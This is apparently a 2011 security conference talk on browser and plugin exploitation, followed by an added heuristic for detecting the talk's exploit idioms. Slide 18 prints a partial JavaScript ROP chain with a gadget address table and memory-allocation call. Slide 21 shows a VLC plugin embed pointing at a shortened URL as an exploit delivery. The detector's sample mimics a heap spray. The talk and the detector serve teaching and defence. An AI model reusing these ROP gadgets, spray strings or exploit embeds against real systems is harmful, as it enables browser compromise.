W.E.B 2011 - The good, the bad, the ugly
My presentation at HackCon #6, Oslo.
Notes
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities, the latest being the command-exec vulnerability in Java Web Start. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • JNLP IE8 exploit on Win7
  • Adobe CoolType exploit on Win7
  • IE8 CSS exploit on Win7

Transcript: W.E.B 2011 - The good, the bad, the ugly

    1. W.E.B. 2011: The good, the bad, the ugly / Saumil Shah / HackCon Oslo, 2011
    2. # who am i / Saumil Shah, CEO Net-square / LinkedIn: saumilshah
    3. "The amount of intelligence in the world is constant. And the population is increasing."
    4. LOOK AT ALL THE COOL STUFF!! / 5
    5. 5 / 33% MORE!
    6. 5 / With JIT! Fights DEP, ASLR!
    7. 5 / Worldwide coverage, / Hides your tracks.
    8. 5 / ...as never seen before!
    9. 5 / GUARANTEED!! / Fresh new bugs, / Present on most computers
    10. (image-only slide, no text)
    11. (image-only slide, no text)
    12. (image-only slide, no text)
    13. It's time for some sploitz!
    14. Obfuscated Javascript decoded without using eval, document.write, etc. / See no eval! / Acrobat CoolType exploit / IE+JNLP exploit
    15. High Tech vs. Low Tech / Acrobat CoolType exploit / Return Oriented Programming code / Escape-From-PDF / No fancy tricks
    16. This iz what ?
    17. I'm an evil Javascript / I'm an innocent image
    18. (JavaScript ROP chain as printed on the slide; the transcript ends mid-function)

```javascript
// Pack a 32-bit value as a little-endian "%uXXXX%uXXXX" string
function packv(n) {
  var s = new Number(n).toString(16);
  while (s.length < 8) s = "0" + s;
  return (unescape("%u" + s.substring(4, 8) + "%u" + s.substring(0, 4)));
}
// Gadget address table
var addressof = new Array();
addressof["ropnop"] = 0x6d81bdf0;
addressof["xchg_eax_esp_ret"] = 0x6d81bdef;
addressof["pop_eax_ret"] = 0x6d906744;
addressof["pop_ecx_ret"] = 0x6d81cd57;
addressof["mov_peax_ecx_ret"] = 0x6d979720;
addressof["mov_eax_pecx_ret"] = 0x6d8d7be0;
addressof["mov_pecx_eax_ret"] = 0x6d8eee01;
addressof["inc_eax_ret"] = 0x6d838f54;
addressof["add_eax_4_ret"] = 0x00000000;
addressof["call_peax_ret"] = 0x6d8aec31;
addressof["add_esp_24_ret"] = 0x00000000;
addressof["popad_ret"] = 0x6d82a8a1;
addressof["call_peax"] = 0x6d802597;
function call_ntallocatevirtualmemory(baseptr, size, callnum) {
  var ropnop = packv(addressof["ropnop"]);
  var pop_eax_ret = packv(addressof["pop_eax_ret"]);
  var pop_ecx_ret = packv(addressof["pop_ecx_ret"]);
  var mov_peax_ecx_ret = packv(addressof["mov_peax_ecx_ret"]);
  var mov_eax_pecx_ret = packv(addressof["mov_eax_pecx_ret"]);
  var mov_pecx_eax_ret = packv(addressof["mov_pecx_eax_ret"]);
  var call_peax_ret = packv(addressof["call_peax_ret"]);
  var add_esp_24_ret = packv(addressof["add_esp_24_ret"]);
  var popad_ret = packv(addressof["popad_ret"]);
  var retval = ""
```

<CANVAS>
    19. (image-only slide, no text)
    20. 100% Pure Alphanum!
    21. VLC smb overflow - HTMLized!!

```html
<embed type="application/x-vlc-plugin"
       width="320" height="200"
       target="http://tinyurl.com/ycctrzf"
       id="vlc" />
```

I'm in ur browser.... / ...blowin up ur g00dz / pwn
    22. OMG! / Teh Intarwebz / are broken!
    23. (image-only slide, no text)
    24. W3C / "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
    25. Application Delivery / The Web at present / Authentication / Statefulness / Data Typing / Non-mutable / HTTP / HTML / AJAX / Flash / Sandbox / HTML5 / Anti-XSS / WAF / Silverlight / Web sockets / MIND THE GAP
    26. Who you gonna call?
    27. howstuffworks - Anti Virus / YER NOT ON THE LIST! COME ON IN.
    28. AV Jedi Mind Trick / These are not the sploitz you're looking for.
    29. 0-day to the Face! / "To get our new signature files you need a valid support plan."
    30. ...and keep on patching
    31. The Solution? / HTML 8.0 / HTTP 2.0 / Browser Security Model / Self Contained Apps
    32. kthxbai / saumil@net-square.com / www.net-square.com
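Added example, not from Saumil Shah's deck: a defender-side heuristic that flags the address-packing idiom of slide 18 (toString(16), zero-pad to 8 hex digits, then unescape("%u"+...) with the halves swapped) together with piles of 32-bit hex literals that look like a gadget table. The indicator regexes, weights and threshold are my assumptions, and both sample scripts are constructed with made-up values.

```javascript
// Added example: heuristic scan for packv()-style address packing (slide 18).
// Indicator patterns, weights and the threshold are assumptions.
const INDICATORS = [
  // unescape() fed a run of %uXXXX words: raw 16-bit values written into a JS string.
  { name: "unescape_u_escape", re: /unescape\s*\(\s*["'](?:%u[0-9a-fA-F]{4}){2,}/g, weight: 3 },
  // "%u" glued to substring() halves of a hex string: a DWORD packed little-endian.
  { name: "runtime_u_packing", re: /["']%u["']\s*\+\s*\w+\.substring\(/g, weight: 3 },
  // toString(16) followed shortly by a pad-to-8-chars loop.
  { name: "hex_pad_to_8", re: /toString\(16\)[\s\S]{0,80}length\s*<\s*8/g, weight: 2 },
  // 8-digit hex literals; several together look like an address/gadget table.
  { name: "dword_literal", re: /0x[0-9a-fA-F]{8}\b/g, weight: 1 },
];

// Count every indicator in a script body and return { score, hits }. A lone
// DWORD literal (a colour, a mask) is normal, so those score only from 4 up, capped at 10.
function scanScript(src) {
  const hits = {};
  let score = 0;
  for (const ind of INDICATORS) {
    const n = (src.match(ind.re) || []).length;
    if (n === 0) continue;
    hits[ind.name] = n;
    if (ind.name === "dword_literal") {
      if (n >= 4) score += ind.weight * Math.min(n, 10);
    } else {
      score += ind.weight * n;
    }
  }
  return { score, hits };
}

// Verdict threshold (assumed): one lone low-weight hit is not enough.
function isSuspicious(src) {
  return scanScript(src).score >= 5;
}

// Constructed sample shaped like slide 18's packv()/addressof[]; the hex
// values are made up, not the deck's gadget addresses.
const SUSPECT = `function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;
return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
var addressof=[];addressof["a"]=0x11223344;addressof["b"]=0x11223355;
addressof["c"]=0x11224466;addressof["d"]=0x11335577;addressof["e"]=0x00000000;
var spray=unescape("%u9090%u9090%u9090%u9090");`;

// Constructed benign sample: one colour constant and ordinary encoding.
const BENIGN = `var color=0x00ff00ff;var label=(255).toString(16)+" px";
document.title=decodeURIComponent("%E2%9C%93 done");`;
```

Run scanScript() over script bodies pulled from a proxy or a sandboxed page fetch; the hits object tells you which idiom fired, which matters more than the raw score when tuning.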